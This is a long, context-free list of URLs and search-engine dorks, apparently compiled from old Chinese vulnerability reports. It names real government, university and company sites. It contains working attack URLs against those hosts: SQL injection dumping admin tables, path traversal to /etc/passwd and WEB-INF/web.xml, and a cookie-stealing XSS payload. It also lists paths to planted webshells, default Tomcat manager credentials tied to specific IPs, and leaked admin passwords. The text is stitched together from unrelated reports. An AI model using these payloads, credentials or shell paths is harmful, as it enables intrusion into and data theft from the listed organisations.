http://electric.ncepu.edu.cn:7010/Notice.aspx?id=1 http://whdkj.gov.cn http://zb.muc.edu.cn/svlcontent?action=FETCH_CONTENT&content_id=1082 http://cwcx.muc.edu.cn/newsContent.aspx?contentID=269&ClassID=17 http://xyb.cupl.edu.cn/Alumni_Profiles.aspx?stype=10 http://xyb.cupl.edu.cn/Alumni_news.aspx?id=329 http://xyb.cupl.edu.cn/Alumni_mien.aspx?id=314 http://zhaopin.cau.edu.cn/showPolicyBulletinDetail.php?type=1&id=74 http://www.lib.cau.edu.cn/news/show_newss.html?id=1488 data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpIDwvc2NyaXB0Pg== http://www.njgjj.com/skywcm/query/gjj_query/gjjlogin.jsp http://124.133.2.2/siteserver/login.aspx http://58.251.145.106/ http://210.13.199.140/acc/accountQry.action?openid=****** http://210.13.199.140/acc/accountQry.action http://iamc.fzu.edu.cn/admin/index.php http://map.qq.com/ http://124.42.45.165/logon.aspx http://202.99.59.114:8080/ http://202.99.59.114:8080/MHJC/ http://202.99.59.114:8080/aaep-manager/ userid:2988294 userid:2988309 http://jpkc.gmc.edu.cn/ http://jpkc.gmc.edu.cn/页面) http://58.251.151.40/ http://58.251.151.40/everBrightInt/sys/request/getbackpassword.request http://116.228.55.189:8887/blazerV4.3/turnLoginAction.do?action=login&username=test&password=1111111&uname=1111&_out=json&_dc=1412066658660&callback=stcCallback1001 http://kf.bestpay.com.cn:8887/blazerV4.3/index.jsp,暂时没找到其他使用这个系统的 http://IP:8887/blazerV4.3/product/runPageAction.do?action=open&page=352&id=61 inurl:download.jspx?path= www.xxczj.gov.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml www.zzcz.gov.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml http://www.ncnynm.com/ http://www.bjwh.gov.cn/cms/jsp/culture/CULPINFO_qiye_select.jsp http://www.bjwh.gov.cn/cms/jsp/culture/CULPINFO_select.jsp http://www.ccgp-jiangsu.gov.cn:8081/carxygh/carSeach.do?car_manufacturers=122 http://drops.wooyun.org/papers/548 http://59.50.33.86:9000/login/login.php http://58.220.225.28:8080/login/login.php 
http://58.220.225.28:8080/login/login.php http://prm.chanjet.com/login/login.php http://222.41.174.190:8088/login/login.php http://crm.pearmain.cn/login/login.php http://crm.transn.net/login/login.php http://crm7.abgroup.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://nc.shineroad.com/login/login.php http://crm.westernpower.cn/login/login.php http://crm.siweidg.com/login/login.php http://crm.shineroad.com/login/login.php http://114.242.164.151:8080/login/login.php http://www.herenpearl.com:9000/login/login.php http://crm7.cfldcn.com:8090/login/login.php http://crm.westernpower.cn/login/login.php http://crm1.szreach.com/login/login.php http://crm1.nj-int.com.cn/login/login.php http://crm.servodynamics.com.cn:8088/login/login.php http://yindajituan.gicp.net:8888/index.php http://crm.llll.com.cn/login/login.php(该域名略屌) http://crm.zooren.com/login/login.php http://59.50.33.86:9000/login/forgetpswd.php?orgcode=admin&loginname=admin* http://nc.shineroad.com/login/forgetpswd.php?orgcode=admin&loginname=admin* http://crm.westernpower.cn/login/forgetpswd.php?orgcode=admin&loginname=admin* http://crm.llll.com.cn/login/forgetpswd.php?orgcode=admin&loginname=admin* http://crm.servodynamics.com.cn:8088/login/forgetpswd.php?orgcode=admin&loginname=admin* http://wooyun.org/bugs/wooyun-2014-072520 http://wooyun.org/bugs/wooyun-2014-072520 http://www.lijiang-airport.com asp:123*123 asp:admin asp:admin asp:caonima(密码亮了) http://www.strongsoft.net/ http://www.ghqy.cc/manage/Admin_List.aspx http://www.ghqy.cc/manage/Admin_Add.aspx?id=2 http://www.zyhcwq.com/manage/Admin_List.aspx http://www.zyhcwq.com/manage/Admin_Add.aspx?id=2 http://www.gzysljj.com/manage/Admin_List.aspx http://www.gzysljj.com/manage/Admin_Add.aspx?id=2 http://www.bjzj.gov.cn/manage/Admin_List.aspx http://www.bjzj.gov.cn/manage/Admin_Add.aspx?id=2 http://www.1yh1.com/manage/Admin_List.aspx http://www.1yh1.com/manage/Admin_Add.aspx?id=2 http://www.hcqrs.gov.cn/manage/Admin_List.aspx 
http://www.hcqrs.gov.cn/manage/Admin_Add.aspx?id=2 http://gzxpjkq.com/manage/Admin_List.aspx http://gzxpjkq.com/manage/Admin_Add.aspx?id=2 http://www.gzztgs.com/manage/Admin_List.aspx http://www.gzztgs.com/manage/Admin_Add.aspx?id=2 http://www.gzhtjl.com/manage/Admin_List.aspx http://www.gzhtjl.com/manage/Admin_Add.aspx?id=2 http://1yh1.com/manage/Admin_List.aspx http://1yh1.com/manage/Admin_Add.aspx?id=2 http://www.zydfjx.com/manage/Admin_List.aspx http://www.zydfjx.com/manage/Admin_Add.aspx?id=2 http://mail.pbcti.cn/webmail/login9.php http://gongxiao.cj.gov.cn http://mail.gsepdi.com:8080/webmail/getPass.php?email=gsepdi@gsepdi.com&update=s http://www.gsepdi.com:8080/webmail/client/cache/6/14120901895.jpg/.php http://mail.lotustv.cc/ http://wooyun.org/bugs/wooyun-2010-061894 http://wooyun.org/bugs/wooyun-2010-061859 http://mail.coes.org.cn/webmail/client/cache/324/14120865545.jpg/1.php http://www.coes.org.cn/rollbook/default.asp http://www.czzfgjj.com.cn http://db.178.com/lol/ http://gdue.cumt.edu.cn/jijin/newsshow.asp?id=466 http://sist.swjtu.edu.cn/XYGK/teachers/infoshow.asp?id=1096 inurl:/custom/GroupNewsList.aspx http://epstest.chinajiutai.com/ http://eps.hjgrp.com/ http://trademb.lgmi.com/ http://www.dmegc.net/ http://eps.chinajiutai.com/ http://eps.delongsteel.com/ http://eps.xinjinsteel.com/ http://www.qlszb.com/ http://eps.gfgt.com/ http://eps.sinoma-cem.cn/ http://eps.xltl.com.cn/ http://imtrademb.lgmi.com/ http://60.213.35.133:81/ http://www.sdlg.info/ http://58.218.196.218:90/ http://ygcg.xuangang.com.cn/ http://ebidding.renesola.com/ http://eps.eastcom.com/ http://www.lzpbzx.com/ http://em.giti.com/ http://bid.hong-lu.com:82/ http://azbid.zj31.com.cn/ http://eps.hjgrp.com/ http://epstest.chinajiutai.com/ http://eps.hjgrp.com/ http://trademb.lgmi.com/ http://www.dmegc.net/ http://eps.chinajiutai.com/ http://www.turbomail.org/download.html inurl:/zjwd.aspx?TemplateType= 
http://la.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=ED5AB424-44B5-4583-8AE1-9ECB34822EF8 http://chz.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=ED5AB424-44B5-4583-8AE1-9ECB34822EF8 http://szsx.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=ED5AB424-44B5-4583-8AE1-9ECB34822EF8 http://xc.ahnw.gov.cn http://hn.ahnw.gov.cn http://bb.ahnw.gov.cn http://szsx.ahnw.gov.cn http://chz.ahnw.gov.cn http://qy.ahnw.gov.cn http://szlb.ahnw.gov.cn http://bz.ahnw.gov.cn http://tl.ahnw.gov.cn http://sc.ahnw.gov.cn http://hsnw.ahnw.gov.cn http://la.ahnw.gov.cn http://www.nssc.org.cn/TBulletAction1/showTBulletDetails.action http://wooyun.org/bugs/wooyun-2010-061894 http://mail.jzbank.net/webmail/client/cache/8/14112662048.jpg/1.php http://sites.sdjzu.edu.cn/jiaomingqi/wgjzs.asp?id=53 http://222.211.85.90:8080/LMS/ http://isfashion.com/isfashion.zip http://k.yiban.cn/index.php?c=useredit&a=stuDetail&uid=3178 http://jky.gznu.edu.cn/news.asp?id=1260 http://crm.7daysinn.cn/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=E:/webs http://www.jnrsks.gov.cn/UpLoadFiles/Contents/2014-9/2014090216085611701.xls http://www.jnrsks.gov.cn/UpLoadFiles/Other/2012-8/2012082416582290345.xls http://edu.baidu.com http://edu.baidu.com/marketing2014/UserLogin.aspx http://edu.baidu.com/marketing2014/UserLogin.aspx http://edu.baidu.com/marketing2014/UserLogin.aspx http://edu.baidu.com/marketing2014/admin/login.aspx http://auto.ynet.com/cgi/subbrand.php?subid=13 http://cbi.hzau.edu.cn/cgi-bin/CRISPR http://others.enet.com.cn/research/research_result.php http://others.enet.com.cn/research/config.php http://www.hclr.gov.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%28md5%283134%29%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 
http://www.jzglz.suzhou.gov.cn/InitAction_toIndex.action http://www.xaepb.gov.cn/ajax/comm/attach/downloadFile.jsp?sPath=NewAtta&trid=6939 http://dep.gduf.edu.cn/xctz/Main_toIndex.action http://search.dangdang.com/?key=test http://geekfree.sinaapp.com\ http://jwc.buu.edu.cn/message/message/goTypeList.jhtml?type=c1001 http://bjcac.buu.edu.cn/?l=one&id=2&t=1412085004 http://bjcac.buu.edu.cn/?l=news&id=97 http://yanzhao.bsu.edu.cn/chname.asp?user_id= http://dx.uibe.edu.cn/list_new.asp?bid=97&dir=dxgk http://dx.uibe.edu.cn/list_new.asp?bid=&id=&dir=djdt http://dx.uibe.edu.cn/list_new.asp?bid=120&id=79 http://mbaxsxt.uibe.edu.cn/TeachingClass.aspx?t=3 http://www.tcl.com/admin.php/Public/login http://sms.rdfzxishan.cn/serverlog.do http://sms.rdfzxishan.cn/index.do http://www.thjdpx.org/entity/first/firstInfoNews_toIndex.action http://202.38.194.204:8080/epsu_08/wbo/ http://202.38.194.204:8080/epsu_08/wbo/FCKeditor/_whatsnew.html http://www.cysjw.gov.cn/manage/index.asp http://www.cyzffz.gov.cn/admin/main.asp http://www.cysl.gov.cn/news/admin/admin.asp http://cmis.bhfz.com/cmis40/ http://www.cs2c.com.cn/view.php?id=33&type=file&module=download www.ycpai.com http://www.ycpai.com https://mail.cs2c.com.cn/nsmail.zip http://osc.cs2c.com.cn/forum/ demo:http://gov.tongda2000.com/ http://gov.tongda2000.com/vote/default/showvote/id/4/isopen/1 http://www.spprec.com/scztb/fckeditor/editor/fckeditor.html http://220.181.109.229/qisu/login http://220.181.109.218:8080/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://xxx/email/setting/other?box_id=1 http://osc.cs2c.com.cn/forum/index.php https://github.com/insekkei/os-cs2c-backup/blob/7d768e509d050d76daaf7c56a63790055e703b9f/html/forum/upload/uc_server/data/config.inc.php http://fmi.com.cn/web.zip http://www.kuihua.net/ http://www.china-cet.com/zhutineirong.php?id=23 http://www.vbmcms.com/ http://city.vbmcms.com http://city.vbmcms.com/wap/index.php http://sqlmap.org 
http://jwgl.hrbcu.edu.cn/ACTIONSHOWINFO.APPPROCESS?mode=4&size=10 http://jyw.hrbcu.edu.cn/jyw/inc_infoshow.asp?incid=176 http://neocertify.cs2c.com.cn/fckeditor/editor/dialog/fck_about.html http://portal.cdpf.org.cn/sysmgr/ inurl:Exam/Default.aspx http://www.jhpx.com:8002/exam/default.aspx www.yzxxc.gov.cn/Exam/Default.aspx http://www.sxxsdxf.cn/Exam/Default.aspx http://www.sxxsdxf.cn/Exam/Default.aspx http://www.csstudy.gov.cn/Exam/Default.aspx http://www.jhpx.com:8002/exam/default.aspx http://www.yzxxc.gov.cn/Exam/Default.aspx http://www.sxxsdxf.cn/Exam/Default.aspx http://www.whce.gov.cn/Exam/Default.aspx http://gbjy.yw.gov.cn/Exam/Default.aspx http://www.yulinstudy.gov.cn/Exam/Default.aspx http://www.0575study.gov.cn/Exam/Default.aspx http://www.csstudy.gov.cn/Exam/Default.aspx http://wssy.hnsy.org.cn/Exam/Default.aspx http://www.ndgb.gov.cn/Exam/Default.aspx http://zhejian.com/cmp/sfcx_zy.asp?hyxh=12 http://zhejian.com/cmp/sfcx_zy.asp?hyxh=12 http://app.games.renren.com/tags.php?tag=航海之王 http://app.games.renren.com/tags.php?tag=航海之王Ž‹ http://app.games.renren.com/tags.php?tag=航海之王Ž‹ http://map.qq.com/ http://www.guqiu.com/ http://demo.guqiu.com/管理地址http://demo.guqiu.com/admin/用户帐号admin用户密码guqiu.com都在互动程序这个地方 http://demo.guqiu.com/document-12-68.aspx http://www.ccw.com.cn/article/view/75836 http://www.18bg.com/ http://www.chemdb-portal.cn/cmsmember/LoginAloneInput.jspx http://www.hebwj.gov.cn/ http://www.hebwj.gov.cn/template/jgsf.asp?lmlb=F&lmdm=34&tmxh=000000000476 cn:40000 http://202.207.240.57/ http://v3.fnuo123.com/admin123/index.php http://kxrj.guet.edu.cn/guestBook2.aspx?class=11 http://kxrj.guet.edu.cn/guestBook.aspx?class=11 http://apzx.hpu.edu.cn/x.asp http://jt.stdusfc.cn/admin/index.php http://jt.stdusfc.cn//uploads/images/M.php http://www.dfcms.net/acAdmin/acAdminLogin.jsp www.jwc.bupt.cn https://blog-supericybee.rhcloud.com/?p=36 http://club.autohome.com.cn/bbs/thread-c-3313-32393289-1.html 
http://club.autohome.com.cn/bbs/thread-c-3451-30785597-1.html http://211.90.75.34/login.jhtml# http://kf2.meizu.com/iframe_brief.php?style_id=103301880&language=cn http://kf2.meizu.com/iframe_brief.php?style_id=103301880 http://kf2.meizu.com/iframe_brief.php?style_id=103301880 http://www.ickey.cn/2013/stock/search.html?sub2=9&kw=100K%CE%A9&Passiveproduct_page=2 http://www.ickey.cn/2013/stock/search.html?sub2=9&sub3=10&pro_precision=%C2%B11%25 http://www.suyaxing.com/ http://www.iyaya.com/msg/inbox.php http://apps.lib.whu.edu.cn/newbook/show.asp?a=577374 http://gbpx.jlu.edu.cn/gbpx/All/UserMessageInfo1.php?id=10 url:http://58.222.198.202:8000/manager/html user:tomcat pass:tomcat http://58.222.198.202:8000/doApply?name=深蓝&villageF=321203103&villageS=3212031030005&income=100&money=1000&purpose=贩毒&profession=毒贩&address=上帝是女孩&tel=18888888888&email= url:http://221.226.100.162:8000/manager/html user:tomcat pass:tomcat http://www.jiuhu.com/message/login www.pishu.com.cn在同一服务器,容易猜出主站的物理路径~) http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449%27 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449%27 url:http://121.17.35.196:8000/manager/html user:tomcat pass:tomcat url:http://121.28.149.166:8000/manager/html user:tomcat pass:tomcat url:http://121.28.148.43:8000/manager/html user:tomcat pass:tomcat google:THEOL网络教学综合平台,发现用这个平台的学校还真不少。 http://***/eol/common/mail/printmail.jsp?mailID=29944 http://***/eol/common/faq/forum.jsp?forumid=1 http://***/eol/common/forum/admin/permmanage.jsp?forumid=1(权限管理) http://www.phpok.com/phpok.html http://demo.phpok.com http://m.998.com http://localhost:81/iwebmall/modules.php?app=user_guestbook http://www.ztewelink.com/ http://baidu.com http://baidu.com http://baidu.com http://www.goutrip.com/ http://www.whnewnet.com/ http://www.twxj.com/news.asp?act=content&channelid=18&id=212 http://www.twxj.com/news.asp?act=content&channelid=18&id=212 
http://www.whsuxing.com/news.asp?act=content&pid=124&channelid=124&id=317 http://www.hbjnpx.com/news.asp?act=list&pid=123&channelid=123 http://www.xinhuada9.com/news.asp?act=list&channelid=189 http://www.topping.com.cn/news.asp?act=content&channelid=2&id=8 http://www.whktzj.cn/news.asp?act=pro_d&channelid=5 http://www.whfzjt.com/ylsb/news.asp?act=content&channelid=2&id=9 http://www.hbflnet.com/news.asp?act=content&channelid=1&id=332 http://www.hbfuyuan.com/news.asp?act=content&channelid=36&id=61 http://www.yhrypx.com/news.asp?act=list&channelid=6 http://www.whleis.com/news.asp?act=list&pid=125&channelid=125 http://www.whhysx.com/news.asp?act=content&channelid=3&id=109 http://www.hzltravel.com/news.asp?act=content&channelid=1&id=264 http://hbjtshb.com/news.asp?act=content&pid=0&cid=11&id=127 http://www.whfzjt.com/news.asp?act=list&cid=23 http://www.whnewnet.com/ http://www.twxj.com/pic.asp?channelid=12 http://www.twxj.com/ http://www.whsuxing.com/ http://www.hbjnpx.com/ http://www.xinhuada9.com/ http://www.topping.com.cn/ http://www.whktzj.cn/ http://www.whfzjt.com/ http://www.hbflnet.com/ http://www.hbfuyuan.com/ http://www.yhrypx.com/ http://www.whleis.com/ http://www.whhysx.com/ http://www.hzltravel.com/ http://hbjtshb.com/ http://www.whfzjt.com/ http://hd.bitauto.com/activity/?id=45 http://data.auto.china.com/SearchAction.do?processID=search http://www.beida100.com/video_play.php?id=25688 http://www.cpis.com.cn/ http://www.cpis.com.cn//userLogin.do http://219.143.8.99/besweb/ http://219.143.8.99/besweb/admin/index.jsp URL:/member/o_upload_image.jspx http://10.10.10.136/dede/dede/tpl.php http://www.zx.scrcu.com.cn/(四川省农村信用社联合社:http://www.scrcu.com.cn/) http://115.182.6.10:8080/src/user.sql http://115.182.6.10:8080/src/ http://led.uni-digital.com.cn/login.action http://www.listentech.com.cn/login.action http://124.164.234.213:8080/login.action http://www.szfd.gov.cn/zjslnsjg.asp?SmallClassID=114&BigClassID=13 
http://www.szfd.gov.cn/more_flfg.asp?SmallClassID=65&BigClassID=14 http://www.szfd.gov.cn/Disp_Feedback.asp?ID=5258&ProcessState=3 http://www.szfd.gov.cn/szfxnews.asp?NewsID=3417 http://www.szfd.gov.cn/news.asp?NewsID=3426 http://www.szfd.gov.cn/More_Feedback.asp?SortType=3 http://www.xhxqlgk.gov.cn/manage/login.asp http://www.midea.com/cn/promotion/app/2014/wish/shike.php api.php/upload http://www.midea.com/cn/promotion/app/2014/wish/uploads/shike/49aaff3781259b293c8885b010658cb4.gif%5Ca.php http://www.whnewnet.com/ http://www.twxj.com/cate.asp?act=list&channelid=21 http://www.twxj.com/ http://www.whsuxing.com/ http://www.hbjnpx.com/ http://www.xinhuada9.com/ http://www.topping.com.cn/ http://www.whktzj.cn/ http://www.whfzjt.com/ http://www.hbflnet.com/ http://www.hbfuyuan.com/ http://www.yhrypx.com/ http://www.whleis.com/ http://www.whhysx.com/ http://www.hzltravel.com/ http://hbjtshb.com/ http://www.whfzjt.com/ http://beauty.online.sh.cn/ http://wenzihui.co.jdzj.com/new_view.asp?id=121272 http://wenzihui.co.jdzj.com/new_view.asp?id=121272 http://metc.hynu.cn/wp/index.aspx http://metc.hynu.cn/wp/myfile/guest/abc/root.ashx http://metc.hynu.cn/wp/myfile/guest/abc/root.asp一句话木马地址 http://metc.hynu.cn/wp/myfile/guest/dama.asp大马 http://61.172.240.227:18264/ http://www.turbomail.org/ http://kdgj.cn http://218.205.119.37/ http://www.zju.edu.cn/service/open_service.php?cmd=chaka http://www.zju.edu.cn/service/open_service.php?cmd=chaka http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=(参数遍历) http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44755 http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44756 http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44757 http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44758 http://www.lanzhourailwaybureau.com.cn/news_pic_dis.asp?x=522 http://222.86.207.241/Wxzj/RepairQuery/OwnerSearchByName.aspx http://www.dyfgs.com/Wxzj/RepairQuery/OwnerSearchByName.aspx 
http://www.ysfgj.com.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx http://www.zylzfc.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx http://221.10.67.197/Wxzj/RepairQuery/OwnerSearchByName.aspx http://222.86.207.241/index.aspx http://kf2.meizu.com/iframe_logo.php?arg=meizu&style_id=103301880&is_zdylogo=1&style_hangye_id=0&logo_lock=0&proxy=&company_id=61397712&gggj_logo=0&key=1&ykey=1&is_yx=Y http://kf2.meizu.com/iframe_logo.php?arg=meizu&style_id=103301880 http://kf2.meizu.com/iframe_logo.php?arg=meizu&style_id=103301880 http://www.qdbofcom.gov.cn/2011nianjian/admin/AdminLogin.asp http://www.hizyy.com/shownews.php?catid=36&id=482 http://www.dreamsoft.in/ http://v.yyrtv.com/player.php?id=871 http://show.qzgb.com/player.php?id=871 http://video.nxtv.cn/player.php?id=871 http://tv.qzgb.com/player.php?id=871 http://v.snwh.gov.cn/player.php?id=871 http://v.zpbbs.cn/player.php?id=871 http://v.0937.net/player.php?id=871 http://ntzx.cn/player.php?id=871 http://tv.qzgb.com/player.php?id=871 http://v.cqtn.com/player.php?id=871 http://v.snwh.gov.cn/player.php?id=871 http://v.0937.net/player.php?id=871 http://ntzx.cn/player.php?id=871 http://show.qzgb.com/player.php?id=871 http://v.cqtn.com/player.php?id=871 http://www.sxsjky.com/Browse/NewsList.aspx?txtKeyword=a http://www.wooyun.org/bugs/wooyun-2014-077752/trace/721caa6272f35ba5b35ae695897195ad http://ecard.sdut.edu.cn/ http://ecard.bzmc.edu.cn/ http://ecard.sdca.edu.cn/ http://59.173.236.220/SelfSearch/Default.aspx http://202.115.192.98/SelfSearch/ http://ykt.szetop.com/SelfSearch/ http://yktweb.cqie.cn/default.aspx http://www.zhengzhong.cn/selfsearch/ http://221.224.167.141/selfsearch/ http://zzcx.scujjedu.cn:114/ http://202.101.244.45/selfsearch/ http://ecard.sdut.edu.cn http://ecard.sdut.edu.cn http://2012.edu.gd.chinamobile.com/newmh/home.do?action=index http://books.ssap.com.cn/MallStore/Store_BookList.aspx?bookclass=218 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449 
http://**.**.**/license!getExpireDateOfDays.action http://221.192.140.99:8080/admin/ http://un.koolearn.com/fckeditor/editor/filemanager/connectors/test.html# http://61.156.3.123:8080/partner/ url:http://218.10.187.143:8081/manager/html user:admin pass:admin http://218.10.187.143:8081/ncmsv4/main.html# http://n.bjtrm.com:7890/trmoto_ms/p.jsp http://n.bjtrm.com:7890/trmoto_ms/test4_.jsp http://www.mgc.ac.cn/cgi-bin/VFs/compVFs/compvfs.cgi?Genus=Mycobacterium http://office.189.cn/ http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!input.do http://office.189.cn http://microsites.audi.cn/2014ade/ade/register_init.action http://microsites.audi.cn/2014ade/2.txt http://mail.qq.com.cgi-bin.frame-html.siduz1gjqsctztfk8br0c141773e.x55.me http://en.mail.qq.com/cgi-bin/loginpage http://14.23.156.26:8090/YHSMSClient/login.action http://www.avepoint.com.cn/toolkit/adminlogin.php http://pa.jsict.com/globeyes/user/index.jsp http://pa.jsict.com:8080/globeyes/admin/ http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516 http://210.29.65.123:8082/ http://210.29.65.123:8081/ http://www.jsict.com/ http://www.pinganyun.cn:8000/jsp/findPassword/findPasswordSetp1.action http://ha.kandian.189.cn:8000/jsp/findPassword/findPasswordSetp1.action http://www.189eyes.com:8000/jsp/findPassword/findPasswordSetp1.action http://sjkd.online.cq.cn:8000/jsp/findPassword/findPasswordSetp1.action http://www.ynpost.com/jc/jcps-car.asp?action=shopbag http://www.ynpost.com/jc/shopsearch.asp http://www.ynpost.com/jc/shoporder.asp POC:http://kcal.pw/t5.htm https://baidu.com http://www.cet.edu.cn/ http://www.cet.edu.cn/tongji_view.php?act=update http://www.cet.edu.cn/ http://demo.yezby.com/ http://demo.yezby.com//web/content_two.aspx?ID=sCzAN8Fr http://jd.cust.edu.cn/jpk/gccl/article_show.asp?id=245 https://61.155.108.212/portal/index.jsp http://store.meizu.com/order/ajax_get_zip_code http://218.200.204.33:8080/manager/html http://60.217.100.172/manager/html http://xgh.hubu.edu.cn/old/sys.asp 
http://58.251.33.155:8080/ http://58.251.33.182:8080/ http://58.251.33.183:8080/ http://211.103.10.110:80/ http://crimlaw.whu.edu.cn/ http://apps.weibo.com/aiweibo ttp://t.cn/Rhdd4Zp http://apps.weibo.com/aiweibo http://oa.ctrl.189.cn/web/login.do http://fuwu.oppo.com:8899/login.asp http://fuwu.oppo.com:8899/files/ http://fuwu.oppo.com:8899/files/policy/343326076.jpg http://219.149.148.74/ http://219.149.148.74/lbsLogin/login.action http://218.200.185.60:8080/ http://60.22.64.131/ http://web2.gdupt.edu.cn/zzzx/index.php?m=index&a=content&id='60 http://www.ddjy.cug.edu.cn/articleShow.jsp?newsID=9969 http://wooyun.org/bugs/wooyun-2014-073053 http://vshare.wo.com.cn/v/ http://game.wo.com.cn/wap_new/index.jsp http://221.212.204.27/ http://221.212.204.27/rzpx1/ http://221.212.204.27/17j5zqh/ http://221.212.204.27/18d/ http://221.212.204.27/jjxx/index.asp http://221.212.204.27/ks/ http://221.212.204.27/nangang/ http://221.212.204.27/rzpx2/ http://221.212.204.27/yilan/ http://221.212.204.27/18d3/adminweb/upimages/nihao.asp IP:27.50.129.6 http://27.50.129.6/index.php?a=login&c=../../../../../../../../../../etc/passwd%00.jpg http://zone.wooyun.org/content/2196 http://hospital.glmc.edu.cn/fckeditor//editor/filemanager/connectors/test.html http://27.17.40.164/Default.aspx http://58.222.235.93:80/ http://60.22.137.14:80/ http://www.hnkj.com.cn/ inurl:/main/model/childcatalog/ http://www.ahhbly.gov.cn/main/model/childcatalog/fileFind.do?fcode=00403&title=aaa http://www.ahly.gov.cn/main/model/childcatalog/fileFind.do?fcode=0010916&title=aaa http://www.ahchizly.gov.cn/main/model/childcatalog/fileFind.do?fcode=01607&title=aaa http://www.ahgdkj.com/main/model/childcatalog/fileFind.do?fcode00106&title=aaa http://zmahzy.ccmcgc.com/main/model/childcatalog/fileFind.do?fcode=02405&title=aaaaaa http://wooyun.org/bugs/wooyun-2010-058381 http://wooyun.org/bugs/wooyun-2014-073439 http://wooyun.org/bugs/wooyun-2010-058381 http://122.225.84.54/ http://www.ruiwen.com/index_style2.php?style2=10 
http://elephant.ruiwen.com/download.php?file_id=400 http://210.21.24.166:80/ http://219.235.89.47/ http://17186.cn/login/login.3.jsp?url1=/component/magicmarket/index.jsp http://17186.cn/activity/step/index.jsp http://www.mxzzzs.com/web/typesearch.aspx http://www.mxzzzs.com/admin/Login.aspx http://hb.kandian.189.cn/WsMobile/login_logout.do http://www.mobile-manage.com.cn:8081/PSLManager/services/GroupServices http://www.cloud-manage.com.cn:8082/CloudService/services/CloudService http://127.0.0.1:6888 http://202.109.75.158:8082/SMGPServer/send.do http://oos-sh.ctyunapi.cn http://oos-sh-iam.ctyunapi.cn http://stuplaza.whut.edu.cn/documents/showarticle.aspx?Article_ID=201311051859319463 http://stuplaza.whut.edu.cn/magazine/list.aspx?Class_ID=20060328144638 http://stuplaza.whut.edu.cn/magazine/content.aspx?Article_ID=201311061927391864 http://stuplaza.whut.edu.cn/quest/showarticle.aspx?Article_ID=201409260013568311 http://gjzx.cumt.edu.cn/news.aspx?newid=213 http://gjzx.cumt.edu.cn/votes.aspx?wenjuan_id=1 http://gdjy.cumt.edu.cn/About.asp?id=12和 http://gdjy.cumt.edu.cn/show.asp?id=2360 http://sac.cumt.edu.cn/view.aspx?id=910和 http://sac.cumt.edu.cn/page.aspx?id=11 http://sjc.cumt.edu.cn/sjfg.aspx?lanmuid=%e5%9b%bd%e5%ae%b6%e5%ae%a1%e8%ae%a1%e6%b3%95%e8%a7%84和 http://sjc.cumt.edu.cn/lanmu.aspx?lanmuid=%e6%96%b0%e9%97%bb%e5%8a%a8%e6%80%81和 http://sjc.cumt.edu.cn/main.aspx?lanmuid=%e5%ae%a1%e8%ae%a1%e5%85%ac%e5%91%8a和 http://sjc.cumt.edu.cn/article.aspx?id=380 http://cmee.cumt.edu.cn/DefaultList.aspx?Location=1 http://gjzx.cumt.edu.cn/fuwu_info.aspx?fuwu_id=47和 http://gjzx.cumt.edu.cn/product.aspx?proid=3 http://cwjh.njau.edu.cn/Views/newsContent.aspx?contentID=345&ClassID=6 http://cwjh.njau.edu.cn/Views/newsContent.aspx?ClassID=2&contentID=46 http://www.hsszjj.gov.cn/dtinfo.aspx?flag=7&id=481 http://kgq.broadair.net:8800/ATCS/disp.action http://yn.kandian.189.cn/WsMobile/login_register.do http://gs.kandian.189.cn/WsMobile/login_login.do 
http://gx.kandian.189.cn/WsMobile/login_login.do http://www.cdyztx.com/login!toLogin.action http://www.yiliangoo.com/ http://124.205.180.177/。 http://124.205.180.177/help.jsp pass:chopper http://www.yiliangoo.com/search.php?g=0&b=0&c=&s=0&k=%27 http://www.ego10000.com/search.php?b=687&c=1'%22&g=703 http://www.ego10000.com/ajax_check_user.php?email= http://ego10000.com/includes/footer.php http://hsypjg.net/login.action http://ms.linekong.com index.php/pay/index/get_servers_select http://pay.g.letv.com http://hctools.it168.com/submit.php?action=get_brand_print&brandid=* http://g.letv.com/dxz/news/206*.html http://www.gzpost.com.cn/WebSite/EMarket/Car.aspx?NavID=26 http://www.gzpost.com.cn/WebSite/EMarket/PeccancySearch.aspx?NavID=26 http://www.gzpost.com.cn/WebSite/PostalInfo/LatticePoint.aspx?NavID=72&ID=520001&upid=1 http://www.gzpost.com.cn/WebSite/PostalInfo/LatticePoint.aspx?NavID=72&ID=1 http://amoi.it168.com/.svn/entries http://apple.it168.com/.svn/entries http://gphone.it168.com/.svn/entries http://www.shaanxijh.com/vote/voteresult.asp?ID=30 http://www.heshigf.com/m_admin/login.asp?err=2 http://www.heshigf.com/page.asp?id=9&typeid=4%27 http://www.xieji001.com/page.asp?id=9&typeid=4%27 http://www.shzeshan.com/page.asp?id=9&typeid=4%27 http://www.musigmagroup.com/page.asp?id=9&typeid=4%27 http://festacorp.com/page.asp?id=9&typeid=4%27 http://sh-xebb.com/page.asp?id=9&typeid=4%27 http://www.edwinlawyer.com/page.asp?id=9&typeid=4%27 http://211.151.82.170/page.asp?id=9&typeid=4%27 http://www.bcrj.com.cn/ url:my.tv189.com inurl:Scenic_detail.php?scenicId= 